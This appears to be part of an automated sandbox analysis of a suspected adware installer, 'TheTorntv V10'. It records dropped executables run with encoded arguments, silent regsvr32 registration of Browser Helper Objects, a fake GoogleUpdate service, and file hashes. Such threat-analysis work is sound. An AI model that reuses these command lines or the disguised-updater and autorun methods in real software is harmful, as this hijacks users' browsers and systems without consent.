C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe"C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe" /rawdata=GwdV2QTQOwN/qIMUuItKsWVvBX166X2T//LkgpPMj4wXnoMJPCaFN1gBjw9y4RkYZHMnO8zRi7HR4Mn5eBsknuhSpshjuDHkyFziPnzM3lxSl9v9dzA3siD9K9W0cbomq8DVEjxdPFtj3kQDgKkWUn1h3qX5MiZh/ClQwFhc4tGKBG47cto5hlU8+53rxdcQJVOvCD044EHIabd3jqgIvN8z0S+kZxzhZ/tLl+HLmOFHcrNsrkfDnh+SXEKhZrJbpxiij+117Pieen5TGz9QUjCI9Wc5dB7Sp9/ACZ5exSEq2OmfNw4pXtDH8Cln3ODsqkJ2mUfhWLoL5Pg0F/VBWEMLBkY0a1GQd0odIpOXUNJpIZMzXrOHz/GDMuBkvhOLFHVunNjUwTxPFkkVQz1L26u2OIKYrTZEpFkvy066iBqpqGfRd8sCulypBc9C+0OAS88sajH7Iw8yEHg0FREExoU8/yHbsHfbNHYHz7BDAtZ0/1/bQSBtPxdsR62Ht7YzLT1woSnpg7R3ak481WU7BN6tDFNwRtVIaP3rx6Ww/8764T4ZBbbbGS9FaNWL5/PO08CqVC0TkJgP8iFqj8D7sZleW0IGEnYmHM3vUpNXAlkQyvITnk51geW3qSh1FiJEj/H5CtayNMI6aiOkQZhA2StPpJXstPXiehhcdWiTTYWxxo5VcY8dWmgJmO/4P6T81M6rkpTWlFLsyzWLGNnf9OFeu/xSFUPxyLqKzNUyw6ex/sww0jqmdnGU5AB1dYyeeud4BTwqizWLTA+bUDTy9pVxF0Lo0lZ3L1be5bPKJHtDJ2hBE9UAlpjKaXQ6Zx8fumOkKfMwK4F7Jq/TK3JW/p+lBLEWQP06nYGu2CUPINvXbhRBYpxF+2/YctCrZnBVIRbt/BpFX+DFVrneoahCUA90OOxxGFWJOE4Zyakl3roEY4mCBMz7ChuvooAiyS3xQH2nxwS5xXJLKQnKdP1AbEFzZreksdf15eBgDGhRTP4qTXRhZyAfBgwm6JVuS12Jhg3a372ADimPASm3/9rU/G0jBmF+2zaM0E/DIzWbFrbPM0ILmzKgULE1KA/eYm0Eo/9vA040D2l3X6R7PdNjxst1LFadvGPHb84CFyL6Z9oB/63/icWjzjc3LhkX7e1zI0F4e0Q58RtMa90SgXrZgEwUk2ODaFvhEe5BZUnA+0GJIql472dYqNmpRoyKKrrcBBp3O8bU1dxC0/tHdGWDB6Ckw8cVoyTiGUBNPwfq2sdVxaLJ7SSILnn5teye7S0IxiAbxL5E+LJ3TIIIRqByX7XYPxP8SN5zHiH3yloeGbEks/Ddc7sTnXqIYpcSeWZC1CZbxbVN4olq7l/kzoLW6l+ToriDCV3S9hUEZWI8Ep6ifPYtd8jmVkdOFjbxdteyl6PMBhZpzb7KOS1JFB1tjxeBAYMzBx/G3uosXwq8Rtvddy1HxmeAoRsfLkurSkbMlltqrldgushWw1Unw6G0O/Y94NkKMYQNnA8ItIuqQdBzz3OmJtQMdPDv/7YekgyOd057ON02ck3tXOWnm4s8C/8VdpgrdxS+tD0U549h2Ws4g6qqmTyLGOAGVq/j8gDZrLK/uBDaJyx2j3h2bh85ajkqejTWHg3XaSzL4OIbVObA2xypyNmbKg9jHUrDvel07KtJXUSd/AACQyGnAVQ8EUuBXNVi0vlL7evoR/hSHcya/sZlAW5tHobusVVv04kkmTqoIgt5T8Al2PRx6Xkqm4t0E2+33U+yICgxH2eq1CqOUF9GTlxPw9AgEAx7Bxgk6mC8Y8C1g9jZeXsGOeQZfcCH1u7Ysb/2v/NaqWs/eV63wlpKt0FKFHzdbDLMEvnk+4i3o2OLoIDQd0d1aMToxQ==3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe"C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe" /rawdata=lk2QdFkaXDck0Cfi1/EWKJoxtkUqkVlYyQSM0E9n5oLPRZp/Oxo1i2RarisUfdgGOytbXVhjANu5kMBmd11ukzuuDQQixvDrUN4/DBI+0+oFlRwpEM1CqJCwpi166rsxSSA7AfKyKmFUYNS/x7Ege7ZhMhxxxv6iSyhfhIASczMeqrWGtXJGN9wXc9d9w/vK1oKIbyMPxukG24pOSY5fjkrqhc3D5o1YTWUGC7AUDoglUIyLDCY4dUzpmyfd+IEe9T9Fvdj4B3PgVY0uFCKiZctR5aZ3jYbbaXk83NDpxYKeIH/l6ZcqNJQohCUt7aHuU4+DUiETWedP4Bt1wclFFIZ++8HJG9y20PZONpfm5/+b2hZMtRPwyeoBLfXfrtF1TgoMqWCSlVknpncrCykn6jOhpHA6vgjUr0Ttdp1EevxdekNNLB+R5uf0acGZLBF0It0+gQoSIcCa0grNstujxj1T/+ICXdTYSuof1BihQisw08VXW8lMxhHbfU6R8NsYAXhy5A/IlON2m3mu0YKkDVJNTDRN7xZUjQn8OMZ2gqiRR6eTt8mKvXIgB8vfIj9hgyutt1KrwuwE4vgzMunur7uAZ819YFmevVn1HT/HleOM3g5qWJdlLOIHfWwwHhk5sES9XH216P2k/PdCCrf9xbMLu0OdNz5499NZ67aSzSiBDJI3nV1OQYLRPCv+ee0nxfMmjwhr9hk56lyPmh3I0fjycYsB1eEinpieUl4Rt00xGsbU9RltSFJcPYDi71o8WnEaGr1LKsqiXTOUhQql8/ugXdBGQwxv2AIuvJyOn3KCXCGxlKIieFDWMhWADHF5ZrOz0oIYu8FrkcYt5RfzGotItpSvlSSvtDj9Nd2Gd/Mzethg+6fgkjO+qX7yo9u6IAFUs0NpmgdGB5f/aYNsyyKLzphB4fNbxfigvS0ou04GRoU4cgRYoFmuAaRM/HLHi58EBIjOlc8i2Kr9+7NnysmdLoePo0z7xPxAIlvXuZT5u18+LdrWtd81daeDHYbKgp/jOspjCuLRP40C8FQBo2X7Zzvfmth2AhfK1tGXA62QVzdpNsGSZyE7jxLyPd4aiPjlcqVKfTCXiSseRW35AZOqMYLi19d83I+xAz/cEyJRjovbAa3CW1MtmItQFW4UEJXXBcaYajKFDPet/pe/DgaXV8kFCDcWuLY6o//n6B9zRlTFhtXp40CPscZ0CpaMVgrc+xwtvy0aCTsAsWZ6L4hSFE9SCLzv/QdvPUeApYrcvtoz70sYW7/rmLMeiQ7CZ2XhDEn6XR9mjHH+K96QSEp2I/KxYpZbEVnhm5o8jATEo5fNMxVLP+/6lldAtDotJ7bTbPQYwl0X3vNyEzgpiIt0dXGci4dJ+RcGOU0/8y/4jUSy1KtNYOns/eCWQV3ql0d+6pUELdWBr2tSTV5ZBdOhPhvf5SQkReylsuWpToziSaMVtIjAzIpo5AeouewzksUXmb1IqXExJG1XsUWwIoe08359//XiQdcw4AKPOaLTDS5oE40eS+C2HiUfEJaxvNgl2C6b2JcNVrgCuov5ek9scZHIXt66NImgO6yiG1e2wtFTZx0o8ZEUoIoRgtK07O5eLWNE+dsErmlcR7HnbF1/S4VowthnxstHu45k1ZDX1Z8SAxxkKK4qHo9/AmFjq61oWS+TDiRt0sP5REQVNS6nj7pfQlJrl2UNp6oVrOg=3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe"C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe" /rawdata=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3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bho.dll"3⤵
- Installs/modifies Browser Helper Object
- Modifies registry class
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bho64.dll"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bho64.dll"4⤵
- Registers COM server for autorun
- Installs/modifies Browser Helper Object
- Modifies registry class
-
C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-codedownloader.exe"C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-codedownloader.exe" /rawdata=n09WJSrAWfyWHknpIeIh8s7XVRhKP3nWSPKQyCIpLEvVVDCK92aDD+P7mAdF2KPomT0BNzdFyQOGI26/1aIjQiGafZAzywVwD/fI2mGGSltjAEawWp8gyD47pxaOHikh0vpZWBPoAF7jweICSaa4rZNbQBsUgtiJ5WFg83/wJcXB/seeCcWhmAV76mhwNOACBn0VAT2MiotBmHbGOa++uHpTBJXtmfFW6EHfN3YNUxwuw8foVOdlg2Xk9hHK5Pw6QKlDYQaa2aWieitybm+rdB4Ch4ZSZi9KI4CR+a5ahGqo0bSn22mdSYi7eY02AScQPdl4qdFeTX+SkDmckNGo+QKsxwOllwLBZ8gtTLK1TPcBft/h24VJ0gCB/MZBo/ge6kMBVhNLsLZWGpdbHly7LRySpNoifDpQslyhVoH4ugCJTBi+f5J2dEodHOmgW02gsPxY8810rP8C9vOoqdJGlveo3/D2GRXXny/mgyJ5ak3Tj7bB9HqR3czqv9PzRYnGTKHqvx0roGx/RZYaxvud3PWPh45hIuY7NwUbAlM+EQQIx43u3CyKfbSt9FilIH0xYbobRktBV0slAKe55Kgm7a64lFp+JctEGu0LJbCimZ50PV+JUhDAaa9QLnOeorxDW4O9m5cKrGm1ekvehPgiFI5LYsV3EWmEKwN8GoTkPfgKcP2yD26TLXVonC5sUOoHRYkSXCSsPOyB6NGRKWKr1TbrLdhrK0OCp6/NsOSmL3XyzP+LxfKIFswBD8S9jtsZSu3+f4ly87S8Brb4trI7bqZJofpFCtKq8DOypkjGLo3vVRphxQLWhSHUzQzo9dRuwwyS14gLt0gPtsL9KWjwqUUdtogwCOfBd4L3PwRJ1/JyiEdyuk+PTt8QxEGEkNobYMq1E/lyDzebtOQaEFSWFPjAO7E35ht2j0k/5buhvZtPvhfZ0mzGAtM4fDF4tyBX76c0FU6SyBMfkHUcxQa67jJjkQge0uvyPa6ZyAIv3o/EH2SnXysjo7q3vohKQ/wyWdKims21+w4V5MKmgk2snC+3d06vmvMecp5SihYrGVm+BwNh6O0uQFUuk87u+LYMNI40MBgs/cvf32IryhvFHV0354NUWXw4mexmSb+jg31pdu/4DPR8Vs5YguIi7WXkj9UUaYpsQzVAmEwPBICIM6Unfiat3JAtLADfSwCmNSp7U2zrre8MlJVfm9fAwQhVj3HGi0eU8HM+otlc1SPBREKjfMb8X1ygL2GjRCVnjGhwom2PFnbROWakjLSBU5aUb+cU8HF0f5stU18vx44O6i6zb9cvJ906ag5rwkL28kJBDYpo5z00wwrDYTPSyCuq8+KsxNGsfhsCusCKJU4yb6JbE2+VxQKBnVjclm/KGE8FeuF2PkUjTXzQMmbR9jdSvCaF+pryOcPhJQ7HUuho2XrzO6hcaiIKCxe9cM6lvZkaAi5sifeFY81Tmmi60ctxiZnc9WnmZ1sd7U2AFnetLQ/H5Q54bUu8ckSOGDOXO1UJfPSJM8lM5cJpyxdTFQ7M3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-codedownloader.exe"C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-codedownloader.exe" /rawdata=kucmA2ctTMen+rVxoD8Iih+se6K9vs/EGlc9c9dXzInJV9c+MjwXhjpAap5CtsNOlHqF3nksz88a09pyLFE7/8+a1Z0JhHaeAVko3czYlSKsfZ49lOb8DZnRiTl8vdK7ZDEuxiv4sTxoKV+ZS4B1GRMHvQu8HmdqPwdFzp5ingSqPbQIKkojxGZn3SV94/VZQT/qWYIUt/pL5QO3mr6RQTHduD/pLiC9jChR2CUIqMuWMf1GD0nN5TaTCK2FSmT3jhj3PCbNFf6kEkLepBvAqQ384rjSj0Td1876dIfcvv82QVUqMfX+XAyAKoC6AGXkq0+I/1N2GizWA/+1bSUzX18GFKGd9YTQVtresTjEbkUUiOncw16sl6SuafJYPSOUrtLedSZdF8PEh17UluP2WJqAztucvp7IDhw1EfVHn3hQQ/lDmw6NAu5RVwj8+AHsI8v3thv01ovY2XAR9+LP2BbSrRCD+2+87quRDpJFnce6ROttt3+w4bhGKnsEIJElFCxUNPnKa/C7oPZIVj8p7dkSjD43Yd4M2AsO1WMqcHKnmp9x9PhRF/pgHdBZJeW4iIzlR1xC6wOEx4PeQRBeFchK0iURZybuaP/INVrMhemppskE68nWlBDt2aLNe/ljRDxWi2KfMsAx9gQcHs36/JdZtG5xM6WCzO2j1Hg0LxAJdxu4IDVBW55uvm1mHmAWQPC/tnZP+XbuaGdYMkbeux0+ZdgWrafjYWieyqrRgmvDHHmHG7DVg9nX7wy+f2JpCU7bAlmhMLPyDxny+xtGtKkEG28X7em/CcEcV7rhqLKCiGn6YjwVwSoRJrN+q8kT0Fv86t+mjdhI0CVQQFXH9EkwLufDhX3QRNehEJi/YUXcRDkWjPUEPi8+lu93fA+o/5lchxzm8CoxAyT1VgUXNqBICONsk0s3t5zqBaUlhSQuVXvtrc8hYwTWftb8FSkAhyuiTaelhJOunbGIN9faAEAfFdYkfT9v8CVs8q9ZTZKeispSSJAXD4ii1SW4h/epEV8v7VwGuY4U42TVBHEDvptb5rampDndU80FrUDokJ2ZXUFfP4QhnVS1vJKbs9LQHXvNo23yfIfdNMd64FrqKgPz17RDQzvc2VzoLTHC1HgMyZKQLJFtbm2KGbKjaTFYLH3G4bspB0Z3eTOoWQbv3bPllKnsn/vfe8FJDVMSw0A4ZwgDo6FfGPU6FPQZAzcGmnVnIJv9gkMxcJWV9DlJo1CYKhHlS2fPv7ZNDSa+jsOx1QqVrtHZ7JHI0oy2CpnHdAhyYBFjrdFaZ8UBHnPAfu5hBauk6mqhbysdfuWEjSa8kVYBwjjBhLitoAyUam77b5GtRuDGgW0RWg1tWRLeuA==3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bg.exe"C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\TheTorntv V10Installer_1669485289.log'3⤵
- Executes dropped EXE
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe"C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe" /svc1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe"C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB2ZXJzaW9uPSIxLjMuMjUuMCIgaXNtYWNoaW5lPSIxIiBzZXNzaW9uaWQ9Ins1RjQ2RTA3OS1EOTlBLTQ2RjAtOTJGQS00NzQxQzNFM0YxQ0J9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHRlc3Rzb3VyY2U9ImF1dG8iIHJlcXVlc3RpZD0iezNGNkU5QjQ5LUY4NDYtNEJFRC04OEVFLTg1NTM3OTc4MDZDMX0iPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSI2LjIiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9InswQzJBRjlEQy02NkQxLTQ4QUUtOTA5MC1DRUJDNjQ3NEE4NDd9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjQ4MDkiIGV4dHJhY29kZTE9IjI2ODQzNTQ1OSIvPjwvYXBwPjwvcmVxdWVzdD4=2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-6.exe"C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-6.exe" /rawdata=mVDY/uDTyiC3wnBUuM03RWN6y1y0EZ1gQxm2x0a/CgwTegD1zIoaNqHDGCyf0DaTT9ul0LLVtDhP2hs3wn2frt/Be0z63a2viz3QzW8ZobS202DunHTtbSGljBynZTzZL60w9tQxlKoo9zpU4F31k41QlCdnmMEQ4WxJtNsWSDyihFRBJ9p67WK/+yyKR3enYlbjDIndfmiH2SplTLPPQfSXgH0cw6mcIxRiKIzjM5jyr9JrmPNP53q56nFdjYsnvQqVBYv3ijRq81eO7IefgjIPAWgvj870KMqKx9yTmweZwKwxrCm5RLN8UBE5gdtmD2pRGS0gZS4oyQ4IH7NN9yPKu2DrI/pMZntXr7LCvJtICTxse62liv94Q0WOlqoSfAUGyFR3FRgoYHZLGcqXNWLEEYg9AYG5DYfI3I/3Lis9Nii8TWkiUS41H+LuTOuW6dYOnp3j5+1q0b4twnvS08uoDSQKmYdFCuuStKnSc6tKofQ1DoDPj6mozEIVmVXbqkPD41AkLVOhFtoU5Bf+KuP+lTkvqf+wpvhDjPTEfxZnc1fMw+jhWkt0I0BnFLXgQgs5vnMwz9oh//Zi3BLh9pfaIW61g+rnPgM1sI1LEWPPMPABXfSwNrtfSyFzDnmiT733egD5ME3hxsXMfjZs7DudNkjyc6mkpS6QJtAG8toEL5km/uayMFLHskAwIa2s+iAkZNId7awPuy1JkN+MRkOLu5IP79YoT9sh3xxSxSt2fy3DV4O/uVy6RECArqgWuSD8PD/gIM6ACg4ajT5KCIXnO2L9T9g6UsX5GCotNplUxa8x4z21br8t7unhV57LY1JQhyOm609IPYGRdsJj+RVPr+TXqs/EJ+R0kDoybiwiAHZgpoLyiKTk0mM//LA5kaNxSThNz2PHR9ReRK+nlJb3sOXqEXodLaGGXrFEiBcFSZoj1PmXSFE6/3Gc163uAN4W2ZymEBtHG8lrGD3vh9IhU7kJnldbrQeFm6vaY2+lwd+Os0OI0xN37vLXUGJ1O1qPKir6X4dXcgUSjuGTPQYwG0lCvuJl1eeJIDFfNqOH+McPWNicWMiYdPXVDcyDbV8LLW8NsoPodEBYkYKXuiQr0UoLN8DqP7xFnXmCJLhKk0tXmG4C15gnvP1BIasOaZDRX7w72SoHOB4YEalqmWMx+49d0dHTCjBQVg8GdeYz86+PxFVCUu+KNG7jgU6XKjmx7G4CqXxB3pNaqeq6xLf5aCu+WyQyeCfo4UhUjuoweP9PJlGXF/g1o1q74JLLsn66jKwqKBjzLLd5YvnpU3YUiGpaFLsKdRURW+fHxizrjOjyhYKuD9zVqRyqJfJoUCAP16JTEptEBBfHYoWguSSX/DH+u22eXZi+mNX1iZpEZCePFIq+XN9v1YUihPSZWJvNDsstX+z3DjQzClObxBw7+O+E2ucp124obQVrtYcqriO8xYZwyYEW1Z3w0P64BRvf+PHjN0Sc8i5Xj23tA4K0sy5aa/DXFsd33C0NgMbydiK6p6FCm5bosoPlffio1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe"C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe" /rawdata=egtu1hN2jKkuYCaYI35SNGvipfdWS4ouhGVwbbYHC1tvT4B3BJUdD7yIcuhoTlF7hRQvJHsXGoOe/Dt17GITi6fm90lrKc/3H5a/aOUeUYhBtObOe++CM79FvUzeEbubM3zxHv1BsQldXIpuD9jlTtAK71aq68adsHykopN3gjFkQpSz6fFR3hvSO3R4sAGwoCYbd9xjWf8b5wh5UbsqWHkwkSJSgrKqCcgpIW9JbbzQtz0mW+9jYLnrl5kl37ekgL10nNbFEdwqkTHRmcuoaC1+FeHlB3DlkEYWIeev7hshqIm7eDLYG8ag1kQEuNUFPf481O5ROjsaI0Nd5zMwBhW14qdtxsu7PXPmEpcTYLIZkRBJzU8FoJqgQ2a0xRaNJnPbPP/okPQglqhxG+59e+i2jMDjyy/tNHWOCiyDDmah/ZXUKxlvIxKgBPbp1urXfiu7H5mGzwKuGYANGUz501q1BqpqjxFG2vJMmYaW1VMC8+J7RRynnQXInuYuBmTTeJW7+sg/lLGxxwCFHZVxxdV8zL+84exf4gea4nMuKJiD4iTcaIuyXSdtaO1R1lacS1pq0e/y52SOrDcTEICe2XW9Hlu89UGM05Yl4Vhn1JtNwFh/4MeUseVXxsHfnu1fuoziioL3J2LY9mmipKWm5v6HnAgZx79/WYhRTVr+o+d0PWF+peSI/ftnbASZDTSPBY7u2g5OyX0gmY7vaioY62HQDe9Zjk1bTGGx00jwtC1DQm4j73nAO8Aa62HanHiNOsbIcDI2HnzCxBc5gfCtvRNFI6/OBwnTogq5/yYlcYJDw66/gNRGKdtmU0h0Jopzj6LHrfqvT4SlILqtVf9wsyWLXYuBfi8BMVftYoomj8SgPqa0rskrg0CalixDcDTsPkj2MFHa+ZsH1Yv26P+PAnYtwIUCAPAEP2oRjGzSL481jbN2xptskQIpERgu2Cm28UqWiKkp60TgoBSebS2FZJUSASXI3dBthdt1zzfv2o7SYxNwvAlnNwhF6CMCMvyA1⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- System policy modification
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\GoogleCrashHandler.exeFilesize
71KB
MD503114dadbd9977fc823f95b21fb987e7
SHA10e7cc420b0be38296ef8516dc3786361119f1f5f
SHA2569ee9cfe293a8c2aa59ac8b65ba93f47c5ed4134793bc0f8102870d63cbb7a68b
SHA512dcd85d7ee439a00827fba3cb2d5c8c24a5a508dd359699a43178c6cfa122d0128659392a29283945757ba8853a0e6a270a2aee003424973c3e4d598cd7635d3f
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\GoogleUpdate.exeFilesize
67KB
MD5d858ba2ee718b1db1ced20646e641d08
SHA101c53fbc0030066fe9032fec431d9ea26b5811cc
SHA2569e63f6d3ab97d53924b975ed233cf595efaedca94ab513398cb892684c8027f1
SHA51208bd015cf63062be24878026a01d07562a5ba5f4eb4f06f2674e13b92d24c31d38580974f23713f67f713c9098c1847b5b1cc49bb89c1c93d8fad2c73d237a4c
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\GoogleUpdate.exeFilesize
67KB
MD5d858ba2ee718b1db1ced20646e641d08
SHA101c53fbc0030066fe9032fec431d9ea26b5811cc
SHA2569e63f6d3ab97d53924b975ed233cf595efaedca94ab513398cb892684c8027f1
SHA51208bd015cf63062be24878026a01d07562a5ba5f4eb4f06f2674e13b92d24c31d38580974f23713f67f713c9098c1847b5b1cc49bb89c1c93d8fad2c73d237a4c
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\GoogleUpdateHelper.msiFilesize
140KB
MD5fc7a2f466f7a0f3e873077505719c1a1
SHA1f729c4cdf49744729357319e10da2514ec40cb03
SHA2565588dfe6fbe9eed8fd7e207cf91cf355979788360e1e27bfc0f0e3208ebeedb4
SHA51243cbbd39e6f02dec5a0df026ba38953587a1c16e2a7a7e898c6ac508ff94fa127264c45ab9e3aaeadbd270666591306970d7718f03a8898bd5f2e6f83cd7f96d
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\goopdate.dllFilesize
744KB
MD5d3d50827c4ca7308d5b88d7f84237952
SHA177f74456b724de1f669931421ff544efbd92d631
SHA25640dfeb752a514b02969859941d36f446d85eb70d2a341ff633da07918c34a789
SHA51223ec0e1f36c254d4e9cac7b2d95629655557c68930e2e2e1352cb1ab5cebf961375085915dc20f83d93d6324fc81cc043f7c5f597f8c33543440e957eb452142
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\goopdate.dllFilesize
744KB
MD5d3d50827c4ca7308d5b88d7f84237952
SHA177f74456b724de1f669931421ff544efbd92d631
SHA25640dfeb752a514b02969859941d36f446d85eb70d2a341ff633da07918c34a789
SHA51223ec0e1f36c254d4e9cac7b2d95629655557c68930e2e2e1352cb1ab5cebf961375085915dc20f83d93d6324fc81cc043f7c5f597f8c33543440e957eb452142
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\goopdateres_en.dllFilesize
26KB
MD5774ab1b133da59008bd91eb7c6253224
SHA15e3c51eb46a11ef91b84f3ac7dbdc91a8264cce5
SHA25624c30e11da859a8b69c5bd165402bb9ac543779d8a147eeed0c0d3128b6c096a
SHA512ea29afa8e4d18eb969f4f57dd726978553fa221cb18f8d5b19e36b5d0b6c8a6990dd10bd2ec6510c3d127097fd37ce03eb71c13804c7de8d343fa2f19c93f075
-
C:\Users\Admin\AppData\Local\Temp\nscD01.tmp\Bodprv.exeFilesize
11.6MB
MD57fcd19898e5a1c153e1937806eddb508
SHA14b61a037745999fad8a52bd48645f44f600eb47d
SHA25663dc76ba3e082f56b22f06c696f6556fcf0a63c12021cbf309e42208fc8e57e9
SHA51222443a80a3796caac4f4d93bea04f4e2d518ed73f84413e46307c8c45c156b15433b22396107f575e207726efee0d7a117cd9f6cb6f8abb004299e9fb407c1e0
-
